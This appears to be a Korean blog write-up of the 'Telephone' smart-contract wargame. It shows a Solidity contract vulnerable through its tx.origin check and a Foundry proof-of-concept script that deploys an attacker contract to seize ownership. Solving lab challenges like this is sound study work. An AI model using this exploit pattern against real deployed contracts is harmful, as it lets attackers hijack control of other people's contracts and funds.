Prob

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Telephone {
    address public owner;

    constructor() {
        owner = msg.sender;
    }

    function changeOwner(address _owner) public {
        if (tx.origin != msg.sender) {
            owner = _owner;
        }
    }
}

 

PoC

EOA대신 CA로 호출하면 owner를 수정할 수 있습니다.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {Script, console} from "forge-std/Script.sol";
interface ITelephone{
    function changeOwner(address _owner) external;
}
contract exploit is Script{
    function run() public{
        uint256 pk = pk;
        vm.startBroadcast(pk);
        new attack();
        vm.stopBroadcast();
    }
}
contract attack{
    constructor(){
        ITelephone target = ITelephone(0x66E30A375F40B30eEA6a12C59f32424842C36502);
        target.changeOwner(0x114C69ba39B7db730504B61fb8861Cb9b25C5540);
    }
}

 

Ref

- https://velog.io/@iwin1203/tx.origin%EC%9D%84-%ED%99%9C%EC%9A%A9%ED%95%9C-phishing-%EC%98%88%EC%A0%9C

 

'wargame' 카테고리의 다른 글

Delegate  (0) 2024.11.13
Coinflip  (0) 2024.11.13
Fallout  (0) 2024.11.13
Token  (0) 2024.11.13
Vault  (0) 2024.11.13

+ Recent posts

티스토리툴바